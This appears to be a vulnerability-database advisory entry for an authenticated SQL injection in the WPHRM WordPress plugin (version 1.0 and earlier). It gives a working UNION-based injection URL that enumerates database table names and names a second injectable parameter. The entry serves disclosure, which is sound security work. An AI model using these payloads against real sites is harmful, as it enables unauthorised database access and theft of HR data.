WPHRM <= 1.0 - Authenticated SQL Injection

2017-10-11T00:00:00
ID WPEX-ID:8929
Type wpexploit
Reporter David Hayes
Modified 2019-11-01T00:00:00

Description

WordPress Vulnerability - WPHRM <= 1.0 - Authenticated SQL Injection

                                        
                                            http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]-23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-

http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]